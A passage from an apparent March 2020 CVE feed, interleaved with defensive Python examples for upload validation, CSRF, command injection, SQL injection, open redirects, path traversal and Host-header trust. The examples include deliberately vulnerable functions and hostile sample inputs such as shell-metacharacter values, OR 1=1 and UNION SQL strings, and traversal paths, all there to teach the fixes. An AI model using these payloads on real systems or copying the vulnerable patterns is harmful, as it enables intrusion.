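    """The failing pattern: deny-list only the final extension.

    "shell.php.jpegd" passes because "jpegd" is not on the list, yet an Apache
    host that maps PHP with AddHandler still executes it because "php" appears
    among the file's extensions.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in EXECUTABLE_EXTENSIONS


def validate_upload(filename: str, data: bytes) -> Optional[str]:
    """Return the extension the file may be stored under, or None to reject it.

    Rules: exactly one extension, on the allowlist, and the content must start
    with that type's magic bytes. Path components and dotfiles are rejected.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return None  # no extension, several extensions, or a dotfile
    ext = parts[1]
    magic = ALLOWED_IMAGE_TYPES.get(ext)
    if magic is None:
        return None  # not on the allowlist
    if not data.startswith(magic):
        return None  # extension claims image, content does not
    return ext


def storage_name(ext: str) -> str:
    """Server-chosen name: the client-supplied name never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name, data in [("shell.php.jpegd", JPEG_SAMPLE), ("photo.jpg", JPEG_SAMPLE),
                       ("photo.jpg", PHP_SAMPLE)]:
        print(f"{name:18} naive={naive_is_allowed(name)!s:5} "
              f"hardened={validate_upload(name, data)}")
```

The validation is only half of the control: the upload directory itself must be served without any script handler, which is the point of the eZ Publish note about vhost configurations that permit only app.php execution.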
2020-03-20 CVE-2019-19025 Cncf, Pivotal Cross-Site Request Forgery (CSRF) vulnerability in multiple products

Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows CSRF in the VMware Harbor Container Registry for the Pivotal Platform.

6.8
2020-03-19 CVE-2019-16068 Netsas Cross-Site Request Forgery (CSRF) vulnerability in Netsas Enigma Network Management Solution

A CSRF vulnerability exists in NETSAS ENIGMA NMS version 65.0.0 and prior that could allow an attacker to be able to trick a victim into submitting a malicious manage_files.cgi request.

6.8
2020-03-19 CVE-2020-10671 Canon Cross-Site Request Forgery (CSRF) vulnerability in Canon OCE Colorwave 500 Firmware 4.0.0.0

The Canon Oce Colorwave 500 4.0.0.0 printer's web application is missing any form of CSRF protections.

6.8
2020-03-19 CVE-2019-16338 Hancom USE After Free vulnerability in Hancom Office NEO 9.6.1.7634

The tfo_common component in HwordApp.dll in Hancom Office 9.6.1.7634 allows a use-after-free via a crafted .docx file.

6.8
2020-03-19 CVE-2019-16337 Hancom USE After Free vulnerability in Hancom Office NEO 9.6.1.9403

The hncbd90 component in Hancom Office 9.6.1.9403 allows a use-after-free via an unknown object in a crafted .docx file.

6.8
2020-03-19 CVE-2020-10648 Denx, Opensuse Improper Input Validation vulnerability in multiple products

Das U-Boot through 2020.01 allows attackers to bypass verified boot restrictions and subsequently boot arbitrary images by providing a crafted FIT image to a system configured to boot the default configuration.

6.8
2020-03-18 CVE-2020-10673 Fasterxml, Debian, Netapp, Oracle

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).

6.8
2020-03-18 CVE-2020-10672 Fasterxml, Debian, Netapp, Oracle

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).

6.8
2020-03-18 CVE-2019-12769 Solarwinds Cross-Site Request Forgery (CSRF) vulnerability in Solarwinds Serv-U Managed File Transfer 15.1.5/15.1.6

SolarWinds Serv-U Managed File Transfer (MFT) Web client before 15.1.6 Hotfix 2 is vulnerable to Cross-Site Request Forgery in the file upload functionality via ?Command=Upload with the Dir and File parameters.

6.8
2020-03-18 CVE-2020-7002 Deltaww Out-Of-Bounds Write vulnerability in Deltaww Cncsoft Screeneditor 1.00.88/1.00.96

Delta Industrial Automation CNCSoft ScreenEditor, v1.00.96 and prior.

6.8
2020-03-17 CVE-2018-21037 Intelliants Cross-Site Request Forgery (CSRF) vulnerability in Intelliants Subrion

Subrion CMS 4.1.5 (and possibly earlier versions) allow CSRF to change the administrator password via the panel/members/edit/1 URI.

6.8
2020-03-16 CVE-2020-9346 Zohocorp Cross-Site Request Forgery (CSRF) vulnerability in Zohocorp Manageengine Password Manager PRO

Zoho ManageEngine Password Manager Pro 10.4 and prior has no protection against Cross-site Request Forgery (CSRF) attacks, as demonstrated by changing a user's role.

6.8
2020-03-16 CVE-2020-7982 Openwrt Injection vulnerability in Openwrt Lede and Openwrt

An issue was discovered in OpenWrt 18.06.0 to 18.06.6 and 19.07.0, and LEDE 17.01.0 to 17.01.7.

6.8
2020-03-16 CVE-2019-20326 Gnome, Linuxmint Out-Of-Bounds Write vulnerability in multiple products

A heap-based buffer overflow in _cairo_image_surface_create_from_jpeg() in extensions/cairo_io/cairo-image-surface-jpeg.c in GNOME gThumb before 3.8.3 and Linux Mint Pix before 2.4.5 allows attackers to cause a crash and potentially execute arbitrary code via a crafted JPEG file.

6.8
2020-03-16 CVE-2020-6585 Nagios Cross-Site Request Forgery (CSRF) vulnerability in Nagios 2.1.3

Nagios Log Server 2.1.3 has CSRF.

6.8
2020-03-16 CVE-2020-10241 Joomla Cross-Site Request Forgery (CSRF) vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

6.8
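Eight entries in this report are CSRF (Harbor, NETSAS manage_files.cgi, the Canon Oce Colorwave web application, the Serv-U upload, Subrion's panel/members/edit/1, ManageEngine Password Manager Pro, Nagios Log Server and Joomla). The Python below is an added example and not code from any of them: an HMAC-based token bound to the session and an issue time, plus a handler for a state-changing request that checks the method, the Origin/Referer header and the token before acting. The server secret, session ids and panel origin are constructed values.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

TOKEN_MAX_AGE = 3600  # seconds a token stays valid


def issue_csrf_token(secret: bytes, session_id: str, now: Optional[int] = None) -> str:
    """Token = timestamp:nonce:HMAC(secret, session:timestamp:nonce).

    Binding the session id into the MAC means a token stolen from one session
    is useless in another; the timestamp bounds its lifetime.
    """
    ts = int(time.time() if now is None else now)
    nonce = secrets.token_hex(8)
    sig = hmac.new(secret, f"{session_id}:{ts}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}:{nonce}:{sig}"


def verify_csrf_token(secret: bytes, session_id: str, token: str, now: Optional[int] = None) -> bool:
    """True only for a well-formed, unexpired token issued for this session."""
    try:
        ts_text, nonce, sig = token.split(":")
        ts = int(ts_text)
    except ValueError:
        return False
    current = int(time.time() if now is None else now)
    if ts > current or current - ts > TOKEN_MAX_AGE:
        return False
    expected = hmac.new(secret, f"{session_id}:{ts}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)  # constant-time comparison


def handle_member_edit(secret: bytes, site_origin: str, method: str, headers: Dict[str, str],
                       session_id: str, form: Dict[str, str],
                       now: Optional[int] = None) -> Tuple[int, str]:
    """A state-changing handler with the checks the CSRF entries lack.

    Returns (status, message). Order: method, then Origin/Referer, then the token.
    """
    if method != "POST":
        return 405, "state changes only via POST"
    origin = headers.get("Origin")
    if origin is not None:
        same_site = origin == site_origin           # exact match, not a prefix test
    else:
        same_site = headers.get("Referer", "").startswith(site_origin + "/")
    if not same_site:
        return 403, "cross-site request"
    if not verify_csrf_token(secret, session_id, form.get("csrf_token", ""), now):
        return 403, "missing or invalid CSRF token"
    # Only now is the change applied (password reset, role change, file upload, ...).
    return 200, f"updated member {form.get('member_id', '?')}"


if __name__ == "__main__":
    secret = b"constructed-server-secret"          # constructed; load from config in practice
    token = issue_csrf_token(secret, "sess-1")
    print(handle_member_edit(secret, "https://panel.example", "POST",
                             {"Origin": "https://panel.example"}, "sess-1",
                             {"csrf_token": token, "member_id": "1"}))
    print(handle_member_edit(secret, "https://panel.example", "POST",
                             {"Origin": "https://attacker.example"}, "sess-1",
                             {"csrf_token": token, "member_id": "1"}))
```

The Origin check is a defence in depth, not a replacement for the token: browsers omit Origin on some requests and Referer can be suppressed by policy, which is why a missing header is treated as cross-site rather than trusted.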
2020-03-19 CVE-2020-3264 Cisco Classic Buffer Overflow vulnerability in Cisco Sd-Wan Firmware

A vulnerability in Cisco SD-WAN Solution software could allow an authenticated, local attacker to cause a buffer overflow on an affected device.

6.6
2020-03-22 CVE-2020-10818 Articatech OS Command Injection vulnerability in Articatech Artica Proxy 4.26

Artica Proxy 4.26 allows remote command execution for an authenticated user via shell metacharacters in the "Modify the hostname" field.

6.5
2020-03-20 CVE-2019-19487 Centreon OS Command Injection vulnerability in Centreon

Command Injection in minPlayCommand.php in Centreon (19.04.4 and below) allows an attacker to achieve command injection via a plugin test.

6.5
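The NETSAS snmp_browser entry (CVE-2019-16072), PerlSpeak (CVE-2020-10674), Artica's hostname field (CVE-2020-10818) and the Centreon plugin test above all pass user-controlled text to a shell. The Python below is an added example, not code from any of those products (the NETSAS CGI and PerlSpeak are Perl, but the pattern is the same): the string-building version is the bug, and the hardened version validates the target as an IP literal or an RFC 1123 host name and hands an argv list to subprocess so that no shell ever parses it. The snmpwalk command line is assumed for illustration.

```python
import ipaddress
import re
import subprocess
from typing import List

# One DNS label: letters, digits and hyphens, no leading or trailing hyphen.
HOSTNAME_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def build_snmp_command_unsafe(ip_address: str) -> str:
    """The failing pattern: user input concatenated into one shell line.

    With ip_address = "10.0.0.1; id" a shell runs snmpwalk and then id.
    """
    return "snmpwalk -v2c -c public " + ip_address + " 1.3.6.1.2.1.1"


def validate_ip(ip_address: str) -> str:
    """Canonical textual IPv4/IPv6 address, or ValueError for anything else."""
    try:
        return str(ipaddress.ip_address(ip_address.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {ip_address!r}") from None


def validate_hostname(hostname: str) -> str:
    """RFC 1123 host name, lower-cased, or ValueError. Shell metacharacters cannot pass."""
    name = hostname.strip().rstrip(".").lower()
    if not name or len(name) > 253:
        raise ValueError(f"bad host name length: {hostname!r}")
    if not all(HOSTNAME_LABEL.match(label) for label in name.split(".")):
        raise ValueError(f"bad host name: {hostname!r}")
    return name


def build_snmp_command(target: str) -> List[str]:
    """argv for snmpwalk: no shell is involved, so metacharacters cannot split the command."""
    try:
        host = validate_ip(target)
    except ValueError:
        host = validate_hostname(target)  # raises if it is neither
    return ["snmpwalk", "-v2c", "-c", "public", host, "1.3.6.1.2.1.1"]


def run_snmp_walk(target: str, timeout: float = 10.0) -> str:
    """Run the walk without a shell and return its stdout (empty on failure)."""
    result = subprocess.run(build_snmp_command(target), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    for candidate in ["10.0.0.1", "switch-01.example.internal", "10.0.0.1; id", "$(id)"]:
        try:
            print(candidate, "->", build_snmp_command(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```

Validation and the argv form are complementary: the allowlist keeps an attacker from smuggling option-looking values such as a leading hyphen into the tool, and the argv form means that even a value the validator misjudged is still only ever one argument. If a shell is genuinely unavoidable, wrap each argument with shlex.quote, but that is the fallback, not the design.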
2020-03-20 CVE-2019-19029 Linuxfoundation, Pivotal SQL Injection vulnerability in multiple products

Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.

6.5
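The SQL injection entries in this report (Cisco vManage, LisoMail, RMySQL, the four SuiteCRM issues, Joomla, CentOS Web Panel's term parameter and Harbor's user-groups) share one root cause: request data spliced into statement text. The Python below is an added example built on the standard-library sqlite3 module and a constructed users table, not code from any of those products. It shows a search built by concatenation returning every row for a crafted term, beside the parameterized form, which also escapes LIKE wildcards so that a user searching for "%" gets a literal match.

```python
import sqlite3
from typing import List

LIKE_ESCAPE = "\\"


def make_sample_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT NOT NULL, role TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def search_users_unsafe(conn: sqlite3.Connection, term: str) -> List[str]:
    """The failing pattern: the search term becomes part of the statement text."""
    sql = "SELECT username FROM users WHERE username LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(term: str) -> str:
    """Escape LIKE wildcards so '%' and '_' typed by a user match themselves."""
    return (term.replace(LIKE_ESCAPE, LIKE_ESCAPE + LIKE_ESCAPE)
                .replace("%", LIKE_ESCAPE + "%")
                .replace("_", LIKE_ESCAPE + "_"))


def search_users_safe(conn: sqlite3.Connection, term: str) -> List[str]:
    """Parameterized: the term travels as a bound value and can never become SQL."""
    sql = "SELECT username FROM users WHERE username LIKE ? ESCAPE '\\' ORDER BY id"
    pattern = "%" + escape_like(term) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_sample_db()
    payload = "nobody' OR 1=1 --"
    print("unsafe:", search_users_unsafe(db, payload))  # every row comes back
    print("safe:  ", search_users_safe(db, payload))    # nothing matches the literal text
    print("unsafe UNION:", search_users_unsafe(db, "' UNION SELECT role FROM users --"))
```

The same two mistakes recur in every one of the listed products regardless of language or database: text concatenation, and treating escaping as the fix. Binding parameters is the fix; escaping wildcards is a separate, functional concern that happens to sit in the same function.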
2020-03-20 CVE-2019-19023 Linuxfoundation, Pivotal

Cloud Native Computing Foundation Harbor prior to 1.8.6 and 1.9.3 has a Privilege Escalation Vulnerability in the VMware Harbor Container Registry for the Pivotal Platform.

6.5
2020-03-20 CVE-2019-16071 Netsas Improper Privilege Management vulnerability in Netsas Enigma NMS 65.0.0

Enigma NMS 65.0.0 and prior allows administrative users to create low-privileged accounts that do not have the ability to modify any settings in the system, only view the components.

6.5
2020-03-19 CVE-2019-16061 Netsas Incorrect Default Permissions vulnerability in Netsas Enigma Network Management Solution

A number of files on the NETSAS Enigma NMS server 65.0.0 and prior are granted weak world-readable and world-writable permissions, allowing any low privileged user with access to the system to read sensitive data (e.g., .htpasswd) and create/modify/delete content (e.g., under /var/www/html/docs) within the operating system.

6.5
2020-03-19 CVE-2019-11361 Zohocorp Incorrect Authorization vulnerability in Zohocorp Manageengine Remote Access Plus 10.0.258

Zoho ManageEngine Remote Access Plus 10.0.258 does not validate user permissions properly, allowing for privilege escalation and eventually a full application takeover.

6.5
2020-03-19 CVE-2020-10678 Octopus Improper Privilege Management vulnerability in Octopus Deploy

In Octopus Deploy before 2020.1.5, for customers running on-premises Active Directory linked to their Octopus server, an authenticated user can leverage a bug to escalate privileges.

6.5
2020-03-19 CVE-2020-4205 IBM Improper Authentication vulnerability in IBM Datapower Gateway

IBM DataPower Gateway 2018.4.1.0 through 2018.4.1.8 could allow an authenticated user to bypass security restrictions, and continue to access the server even after authentication certificates have been revoked.

6.5
2020-03-18 CVE-2019-12123 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

6.5
2020-03-18 CVE-2019-12113 Onap OS Command Injection vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was discovered in ONAP SDNC before Dublin.

6.5
2020-03-18 CVE-2020-8468 Trendmicro Download of Code Without Integrity Check vulnerability in Trendmicro Apex One, Officescan and Worry-Free Business Security

Trend Micro Apex One (2019), OfficeScan XG and Worry-Free Business Security (9.0, 9.5, 10.0) agents are affected by a content validation escape vulnerability which could allow an attacker to manipulate certain agent client components.

6.5
2020-03-18 CVE-2020-8467 Trendmicro Unspecified vulnerability in Trendmicro Apex ONE and Officescan

A migration tool component of Trend Micro Apex One (2019) and OfficeScan XG contains a vulnerability which could allow remote attackers to execute arbitrary code on affected installations (RCE).

6.5
2020-03-17 CVE-2019-20492 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows authentication bypass because of misparsing of the format of the password file (SEC-516).

6.5
2020-03-17 CVE-2019-20490 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows authentication bypass because webmail usernames are processed inconsistently (SEC-499).

6.5
2020-03-17 CVE-2019-20453 Pydio Deserialization of Untrusted Data vulnerability in Pydio

A problem was found in Pydio Core before 8.2.4 and Pydio Enterprise before 8.2.4.

6.5
2020-03-17 CVE-2019-20452 Pydio Deserialization of Untrusted Data vulnerability in Pydio

A problem was found in Pydio Core before 8.2.4 and Pydio Enterprise before 8.2.4.

6.5
2020-03-16 CVE-2019-19538 Sangoma Unspecified vulnerability in Sangoma Freepbx

Sangoma FreePBX 13 through 15 and the sysadmin (aka System Admin) module 13.0.92 through 15.0.13.6 have a Remote Command Execution vulnerability that results in Privilege Escalation.

6.5
2020-03-16 CVE-2020-9471 Umbraco Unrestricted Upload of File With Dangerous Type vulnerability in Umbraco CMS 8.5.3

Umbraco Cloud 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Packages functionality.

6.5
2020-03-16 CVE-2019-19937 Jfrog Improper Input Validation vulnerability in Jfrog Artifactory

In JFrog Artifactory before 6.18, it is not possible to restrict either system or repository imports by any admin user in the enterprise, which can lead to "undesirable results."

6.5
2020-03-16 CVE-2020-5844 Artica Unrestricted Upload of File With Dangerous Type vulnerability in Artica Pandora FMS 7.0Ng

index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location.

6.5
2020-03-16 CVE-2020-10239 Joomla Missing Authorization vulnerability in Joomla Joomla!

An issue was discovered in Joomla! before 3.9.16.

6.5
2020-03-16 CVE-2020-10557 Atutor Unrestricted Upload of File With Dangerous Type vulnerability in Atutor Acontent

An issue was discovered in AContent through 1.4.

6.5
2020-03-18 CVE-2019-12131 Onap Authentication Bypass BY Spoofing vulnerability in Onap Open Network Automation Platform 3.0.0/3.0.1/3.0.2

An issue was detected in ONAP APPC through Dublin and SDC through Dublin.

6.4
2020-03-18 CVE-2019-12124 Onap Unspecified vulnerability in Onap Open Network Automation Platform

An issue was discovered in ONAP APPC before Dublin.

6.4
2020-03-17 CVE-2020-10122 Cpanel Improper Input Validation vulnerability in Cpanel

cPanel before 84.0.20 allows a webmail or demo account to delete arbitrary files (SEC-547).

6.4
2020-03-17 CVE-2020-10118 Cpanel Unspecified vulnerability in Cpanel

cPanel before 84.0.20 allows a demo account to modify files via Branding API calls (SEC-543).

6.4
2020-03-17 CVE-2020-10117 Cpanel Incorrect Authorization vulnerability in Cpanel

cPanel before 84.0.20 mishandles enforcement of demo checks in the Market UAPI namespace (SEC-542).

6.4
2020-03-16 CVE-2019-18917 HP Improper Restriction of Excessive Authentication Attempts vulnerability in HP products

A potential security vulnerability has been identified for certain HP Printers and All-in-Ones that would allow bypassing account lockout.

6.4
2020-03-16 CVE-2019-14887 Redhat Inadequate Encryption Strength vulnerability in Redhat products

A flaw was found when an OpenSSL security provider is used with Wildfly, the 'enabled-protocols' value in the Wildfly configuration isn't honored.

6.4
2020-03-22 CVE-2020-10802 Phpmyadmin, Debian SQL Injection vulnerability in multiple products

In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability has been discovered where certain parameters are not properly escaped when generating certain queries for search actions in libraries/classes/Controllers/Table/TableSearchController.php.

6.0
2020-03-22 CVE-2020-10804 Phpmyadmin SQL Injection vulnerability in PHPmyadmin

In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was found in retrieval of the current username (in libraries/classes/Server/Privileges.php and libraries/classes/UserPassword.php).

6.0
2020-03-19 CVE-2020-7006 Systech Cross-Site Scripting vulnerability in Systech Nds-5000 Firmware and Nds/5008Rm Firmware

Systech Corporation NDS-5000 Terminal Server, NDS/5008 (8 Port, RJ45), firmware Version 02D.30.

6.0
2020-03-20 CVE-2019-19484 Centreon Open Redirect vulnerability in Centreon

Open redirect via parameter ‘p’ in login.php in Centreon (19.04.4 and below) allows an attacker to craft a payload and execute unintended behavior.

5.8
2020-03-18 CVE-2019-14882 Moodle Open Redirect vulnerability in Moodle

A vulnerability was found in Moodle 3.7 to 3.7.3, 3.6 to 3.6.7, 3.5 to 3.5.9 and earlier where an open redirect existed in the Lesson edit page.

5.8
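Both the Centreon (CVE-2019-19484, the `p` parameter of login.php) and Moodle (CVE-2019-14882) entries are open redirects in a "return to this page after login" parameter. The following is an added example, not code from either project: a validator that accepts only same-site targets and rejects the scheme-relative, backslash and userinfo tricks that commonly slip past naive checks. The allow-listed host name and the sample targets are constructed for illustration.

```python
"""Open-redirect target validation for a login 'return to' parameter.

Added example, not Centreon or Moodle code. The allowed host names and the
sample targets are constructed for illustration.
"""
import re
from typing import Iterable
from urllib.parse import urlsplit

_CONTROL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")
_PERMITTED_SCHEMES = ("http", "https")


def is_safe_redirect_target(target: str, allowed_hosts: Iterable[str]) -> bool:
    """True only for same-site targets: an absolute path, or an http(s) URL whose
    host is on the allow-list. Everything ambiguous is rejected."""
    allowed = {h.lower() for h in allowed_hosts}
    if not target or _CONTROL_OR_SPACE.search(target):
        return False
    # Scheme-relative forms. Browsers also read a leading backslash as a slash,
    # so '/\\evil.example' is navigated as '//evil.example'.
    if target.startswith(("//", "/\\", "\\")):
        return False
    parts = urlsplit(target)
    if parts.scheme:
        if parts.scheme.lower() not in _PERMITTED_SCHEMES:
            return False                    # javascript:, data:, or anything else
        if "@" in parts.netloc:
            return False                    # https://portal.example@evil.example
        return (parts.hostname or "").lower() in allowed
    if parts.netloc:
        return False
    return parts.path.startswith("/")       # absolute path on this site only


def safe_redirect(target: str, allowed_hosts: Iterable[str], fallback: str = "/") -> str:
    """Return the target if it is safe, otherwise the site's own fallback page."""
    return target if is_safe_redirect_target(target, allowed_hosts) else fallback


if __name__ == "__main__":
    hosts = {"portal.example"}  # assumed: the site's own public host name
    for candidate in ("/main.php?p=1", "//evil.example/", "/\\evil.example",
                      "https://portal.example@evil.example/", "javascript:alert(1)"):
        print(f"{candidate!r:45} -> {safe_redirect(candidate, hosts)}")
```

The validator deliberately refuses relative paths without a leading slash and any scheme it does not recognise; a redirect parameter should carry a path, so narrowing to that shape costs nothing and removes the parsing ambiguities an attacker relies on.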
2020-03-16 CVE-2019-19610 Halvotec Session Fixation vulnerability in Halvotec Raquest 10.23.10801.0

An issue was discovered in Halvotec RaQuest 10.23.10801.0.

5.8
2020-03-16 CVE-2019-19135 Opcfoundation Insufficiently Protected Credentials vulnerability in Opcfoundation Netstandard.Opc.Ua and Ua-.Netstandard

In OPC Foundation OPC UA .NET Standard codebase 1.4.357.28, servers do not create sufficiently random numbers in OPCFoundation.NetStandard.Opc.Ua before 1.4.359.31, which allows man in the middle attackers to reuse encrypted user credentials sent over the network.

5.8
2020-03-16 CVE-2020-5546 Mitsubishielectric Argument Injection OR Modification vulnerability in Mitsubishielectric Iu1-1M20-D Firmware

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in TCP function included in the firmware of Mitsubishi Electric MELQIC IU1 series IU1-1M20-D firmware version 1.0.7 and earlier allows an attacker on the same network segment to stop the network functions or execute malware via a specially crafted packet.

5.8
2020-03-20 CVE-2020-8134 Ghost Server-Side Request Forgery (SSRF) vulnerability in Ghost

Server-side request forgery (SSRF) vulnerability in Ghost CMS < 3.10.0 allows an attacker to scan local or external network or otherwise interact with internal systems.

5.5
2020-03-19 CVE-2019-16064 Netsas Path Traversal vulnerability in Netsas Enigma Network Management Solution

NETSAS Enigma NMS 65.0.0 and prior suffers from a directory traversal vulnerability that can allow an authenticated user to access files and directories stored outside of the web root folder.

5.5
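The Enigma NMS entry (CVE-2019-16064) is the classic case of a user-supplied path being joined onto the web root without checking where the result ends up. As an added example, not NETSAS code, the block below pairs the vulnerable join with a resolver that normalises first and then tests containment, so that `..` segments, absolute inputs and symlinks that point outside the root are all refused. The directory layout that `demo()` builds in a temporary directory is constructed purely for illustration.

```python
"""Confining file access to a web root.

Added example, not NETSAS code. The directory layout built by demo() is
constructed in a temporary directory purely for illustration.
"""
import os
import shutil
import tempfile
from pathlib import Path


def resolve_under_root(root: Path, requested: str) -> Path:
    """Map a user-supplied relative path onto root, or raise PermissionError.

    Resolution happens after joining, so '..' segments and symlinks inside
    the root that point outside it are both caught by the containment test.
    """
    if "\x00" in requested:
        raise PermissionError("NUL byte in path")
    root = root.resolve()
    # Strip leading separators so an absolute input cannot replace the root.
    candidate = (root / requested.lstrip("/\\")).resolve()
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"path escapes web root: {requested!r}")
    return candidate


def read_under_root_vulnerable(root: Path, requested: str) -> str:
    """Plain join without containment: '../' walks straight out of the root."""
    return Path(os.path.join(str(root), requested)).read_text()


def demo() -> dict:
    """Build a root with one public file, one symlink that escapes, and a secret outside."""
    base = Path(tempfile.mkdtemp())
    try:
        root = base / "webroot"
        (root / "docs").mkdir(parents=True)
        (root / "docs" / "readme.txt").write_text("public")
        (base / "secret.txt").write_text("outside")
        (root / "escape").symlink_to(base / "secret.txt")

        results = {
            "vulnerable_reads_outside": read_under_root_vulnerable(root, "../secret.txt"),
            "hardened_ok": resolve_under_root(root, "docs/readme.txt").read_text(),
            # An absolute input is re-rooted, not honoured.
            "absolute_input_stays_inside": root.resolve() in resolve_under_root(root, "/etc/passwd").parents,
        }
        for name, req in (("dotdot", "../secret.txt"), ("symlink", "escape"),
                          ("encoded_dotdot", "docs/../../secret.txt")):
            try:
                resolve_under_root(root, req)
                results[name] = "allowed"
            except PermissionError:
                results[name] = "blocked"
        return results
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:30} {value}")
```

The check is on the resolved path, which is what matters; a prefix comparison on the raw string would accept `webroot_backup/..` style siblings and miss symlinks entirely. If an attacker can create symlinks under the root between the check and the open, open with `O_NOFOLLOW` or an `openat`-style directory handle as well.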
2020-03-16 CVE-2019-20491 Cpanel Unspecified vulnerability in Cpanel

cPanel before 82.0.18 allows attackers to leverage virtual mail accounts in order to bypass account suspensions (SEC-508).

5.5
2020-03-16 CVE-2019-19821 Combodo Cross-Site Scripting vulnerability in Combodo Itop

A post-authentication privilege escalation in the web application of Combodo iTop allows regular authenticated users to access information and modify information with administrative privileges by not following the HTTP Location header in server responses.

5.5
2020-03-22 CVE-2020-10807 Mitre Missing Authentication FOR Critical Function vulnerability in Mitre Caldera

auth_svc in Caldera before 2.6.5 allows authentication bypass (for REST API requests) via a forged "localhost" string in the HTTP Host header.

5.0
2020-03-21 CVE-2019-18936 Bloq Uncontrolled Recursion vulnerability in Bloq Univalue

UniValue::read() in UniValue before 1.0.5 allows attackers to cause a denial of service (the class internal data reaches an inconsistent state) via input data that triggers an error.

5.0
2020-03-21 CVE-2019-17185 Freeradius Improper Input Validation vulnerability in Freeradius

In FreeRADIUS 3.0.x before 3.0.20, the EAP-pwd module used a global OpenSSL BN_CTX instance to handle all handshakes.

5.0
2020-03-20 CVE-2019-16528 Mediawiki Information Exposure vulnerability in Mediawiki Abusefilter 1.32/1.33

An issue was discovered in the AbuseFilter extension for MediaWiki.

5.0
2020-03-20 CVE-2020-8136 Fastify Resource Exhaustion vulnerability in Fastify Fastify-Multipart

Prototype pollution vulnerability in fastify-multipart < 1.0.5 allows an attacker to crash fastify applications parsing multipart requests by sending a specially crafted request.

5.0
2020-03-20 CVE-2020-9425 Rconfig Insufficiently Protected Credentials vulnerability in Rconfig

An issue was discovered in includes/head.inc.php in rConfig before 3.9.4.

5.0
2020-03-20 CVE-2020-10792 IT Novum Incorrect Default Permissions vulnerability in It-Novum Openitcockpit

openITCOCKPIT through 3.7.2 allows remote attackers to configure the self::DEVELOPMENT or self::STAGING option by placing a hostname containing "dev" or "staging" in the HTTP Host header.

5.0
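The Caldera (CVE-2020-10807) and openITCOCKPIT (CVE-2020-10792) entries share one root cause: a security decision is made from the `Host` header, a string the client chooses. The block below is an added example, not code from either project. It reproduces both vulnerable checks next to hardened ones that compare `Host` exactly against configured names and decide "is this a local request" from the TCP peer address instead. The request model, the allow-listed host names and the sample requests are assumptions.

```python
"""Host-header trust, vulnerable and hardened.

Added example, not Caldera or openITCOCKPIT code. The request model, the
allow-listed hostnames and the sample requests are assumptions.
"""
from dataclasses import dataclass, field
from ipaddress import ip_address
from typing import Dict

# Names the operator configured this deployment to answer to (assumed values).
ALLOWED_HOSTS = frozenset({"caldera.example.internal", "localhost", "127.0.0.1", "[::1]"})
# Deployment mode comes from server-side configuration, never from the request (assumed).
ENVIRONMENT = "PRODUCTION"


@dataclass
class Request:
    peer_ip: str                                           # where the TCP connection came from
    headers: Dict[str, str] = field(default_factory=dict)  # header names lower-cased

    def host(self) -> str:
        return self.headers.get("host", "")


def is_local_vulnerable(req: Request) -> bool:
    """Caldera pattern: a client-supplied string decides whether auth is required."""
    return "localhost" in req.host()


def environment_vulnerable(req: Request) -> str:
    """openITCOCKPIT pattern: substrings of Host select DEVELOPMENT or STAGING mode."""
    host = req.host().lower()
    if "dev" in host:
        return "DEVELOPMENT"
    if "staging" in host:
        return "STAGING"
    return "PRODUCTION"


def _hostname_only(host: str) -> str:
    """Drop an optional :port; keep bracketed IPv6 literals intact."""
    host = host.lower().strip()
    if host.startswith("["):
        return host.split("]", 1)[0] + "]"
    return host.split(":", 1)[0]


def host_is_allowed(req: Request) -> bool:
    """Exact match against configured names; no substring or suffix logic."""
    return _hostname_only(req.host()) in ALLOWED_HOSTS


def is_local_hardened(req: Request) -> bool:
    """Decide from the transport, which the client cannot forge, not from a header."""
    try:
        return ip_address(req.peer_ip).is_loopback
    except ValueError:
        return False


def check_request(req: Request) -> dict:
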